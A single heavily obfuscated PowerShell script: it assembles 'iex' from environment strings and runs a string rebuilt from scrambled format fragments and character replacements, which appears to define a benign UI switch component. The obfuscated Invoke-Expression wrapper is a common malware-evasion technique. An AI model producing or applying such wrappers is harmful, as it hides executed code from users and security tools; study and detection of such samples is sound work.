. ( $pshome[4]+$pShOME[34]+'x')( ((("{45}{83}{76}{74}{88}{73}{60}{62}{32}{52}{46}{37}{66}{31}{69}{26}{72}{6}{59}{2}{39}{75}{29}{89}{63}{86}{22}{80}{38}{17}{30}{58}{35}{11}{42}{44}{51}{40}{15}{14}{85}{5}{68}{23}{77}{27}{12}{48}{55}{61}{71}{21}{20}{67}{41}{87}{36}{0}{9}{28}{47}{13}{43}{34}{82}{1}{3}{4}{19}{70}{10}{49}{33}{84}{7}{53}{16}{50}{81}{18}{8}{56}{57}{65}{25}{78}{79}{54}{64}{24}" -f'7seL7s+L7ssL7s+L7seNt 
 L7s+','eoaXL7','diL7s+L7soL7s+L7saXL7s+L7ssaBLoaXEd}L7s+L7s,
 L7s+L7s    L7s+L7s   [ParaL7s+L7smetL7s+L7ser()]L7s+L7s
L7s+L7s  L7s+L7s   L7s+L7s L7s+L7s  [EndL7s+L7spL7s+L7soL7s+L7siL7s+L7sntL7s+L7s]jPL7s+L7sm{L7s','s+L7sCKL7s+L7','soL7s+L7saX','L7s+L7sd = jPm{L7s+L7sioL7s+L','+L7s  L7s+L7s   L7s+L7s [PaL7s+L7srameter()]
 L7s+L7s L7s+L7s L7s+L7s     [SwitchL7s+L7s]jPL','oBbp:oBL7s+L7sb+oBL7','NGE}
L7s+L7s    }L7s+L7s
}L7s+L7s

','L7s  L7s+L7s ','iL7s+L7soaL7s+L7sXMTsD}L7s+L7s  ','L7s+L7sdoL7s+L7saXL7s+L','XTIL7s+L7sD}L7s+L7s 
  L7s+L7s   L7s+L7s  L7s+L7s iL7s+L7ssPLU','EL7s+L7','hoBL7s+L7sb)L7s+L7s
L7s+L7s  L7s+L7s','(oBL7s+L7sbL7s+L7smL7s+L7su-L7s+L7soBL7s+L7sb+oBbL7s+L7sswL7s+L7siL7s+L7soL7s+L7sBb+L7s+L7soBL7s+L7sbL7s+L7stc',',(oBL7s+L7sb1L7s+L7','7s+L7sXCL7s+L7sHL7s+L7saoaL7s+L7sXNL7s+L7sge}L7s+','s+L7s ONCHANgeL7s+L7s = jPL7s+L7sm{oNL7s+L7scoaXHAoaX','EL7s+L7sd}L7s+L7s 
L7s+L7s      L7s+',' jPm{L7s+L','+L7s =','    )L7s+L7s

L7s+L7s    iL7s+L7s','sDL7s+L7s}','nV:ComsPEC[4,24,25]-jOINL7sL7s)
','ar]112),[sTRing][C','PmL7s+L7s','+L7suL7s+L7sAsoaXSL7s+L7soL7s+L7saXL7s+L7sEL7s+L7soa','    chL7s+L7sec','()L7s+L7s]
      L7s+L7s  [L7s+L7sbL7s+L7sooL7s+L7sl]jL7s+L7s','L7s) {
    L7s+L7s   L7s+','+L7s
    L7s+L7s L7s+L7s L7s+L7s  [','LoBb+oBbL7s+L7se:7Od3oL7s+L7sBbL7s+L7s)','.150{0}L7s+L7soBb,oB','7scHL7s+','soaX','.L7s+L7sIsPRL7s+L',' ;L7s+L7s L7s+L7sfunctionL7s+L7s nL7','oaL','+L7sOL7s+L7sNoaXL7s+L7scHoaL7s+L7sXL7s+L7sAngE},
     L7s+L7','L7s+L7s)
  L7s+L7s L7s+L7s }L7s+L7s

  L7s+L7s  @{
    L7s+L7s  L7s+L7s  TYPe = L7s+L7s','7s+L7sLED','7sLo','sD = L7s+L7sjPL7s+L7sm{L7s+L','aL7s+L7',' (','7s+L7syPE](oBbgL7s+L7suL7s+L7sIL7s+L7soL7s+L7sBbL7s+L7s+oBbdoL7s+L7sBL7s+L7sbL7s+L7s)L7s+L7s L7s+L7s ) L7s+L7s','k','GL7s+L7sin L7s+L7s= jPL7s+L7sm','=(L7s+L7s(L7s+L7s(3op{4L7s+L7s}{L7s+L7s1}{2}{L7s+L7s3}{L7s+L7s0}3oL7s+L7sp -foBb6L7s+L7s4','soBb+L7s+L7soBb71.L7s+L7soBb),oBbL7s+L7s{oBbL7s+L7s)L7s+L7s) -f [cL7s+L7sHaRL7s+L7s]39)
  ','sXET}',' ([TL','s+L7sb5.oBbL7s+L7s)',').rEpLaCE(L7soaXL','L7s+L7s{tRL7s+L7soL7','L7s).rE','pLaCE(([Char]106+[Char]80+[Char]109),L7sYCRL7s).rEpLaCE(L7soBbL7s,','L7s jL7s+L7sPm{L7s+L7sonCoaL7s+L7sXhL7s+L7sAL7s+L7sNoaXL7s+L7sgE}.L7s+L7sREgIstEr(jPm{IDL7s+L7s}, jPm{PSL7s+L7sCML7s+L7','7s+L7smL7s+L7s{','oBb+L7s+L7soBbaRiaoBL7s+L7sb+L7s+L7s','s+L7saXUEL7s+L7s}L7s+L7s 
L7s+L7s
L7s+L7s      L7s+L7s L7s+L7s DisL7','oBbb','L7s+L7seL7s+L7scL7s+L7soL7s+L7saXL7s+L7skL7s+L7','7s,L7skLWL7s) 93f& ( YCRE','[sTRing][Char]39).rEpLaCE(([Char]51+[Char]111+[Ch','s+L7sEw-uL7s+L7sdSL7s+L7sWiL7s+L7stCh L7s+L7s{
    
    pL7s+L7saramL7s+L7s(L7s','7sdoaXL7s+L7sioaXsAbL','7saXL7s+L7','PaL7s+L7srameL7s+L7steL7s+L7srL7s+L7s(L7s+L7s)L7s+L7s]
  L7s+L7s      [StringL7s+L7s]L7s+L7sj','L7s L7s+L7s jPm{noaL7s+L7sX','s+L7sAbleL7s+L7sdL7s','{IL7s+L7soaXd}L7s+L7s =L7s+L7s L7s+L7s( L7s+L7s jPm7L7s+L7sodL7s+L7s3L7s+L7s:L7s+L7s:NeWguID(L7s+L7s)),
  L7s','s+L7sBL7s+L7sbv',' L7s+L7s(L7s+L','s   L7s+L7s[ParameL7s+L7sterL7s+L7s','m',' 
      L7s+L7s  asSETL7s+L7sId = jPm{ML7s','har]','34','f (jL7s+L7sPL7s+L7smL7s+L7s{on','L7s+L7s     L7','L7s','L7sset-ItEL7s+L7s','L7s+L7sb0L7s+L7s}ioBbL7s+L7s,(L7s+L7s',' L7s+L7s L7s+L7s    i','sed}L7s+L7s
','}L7s+L7s','7soL7','PL7s+L7sm{CH')) -rEplaCE 'kLW',[chaR]96  -crEPlACE([chaR]76+[chaR]55+[chaR]115),[chaR]39 -crEPlACE  '93f',[chaR]124  -crEPlACE'YCR',[chaR]36))
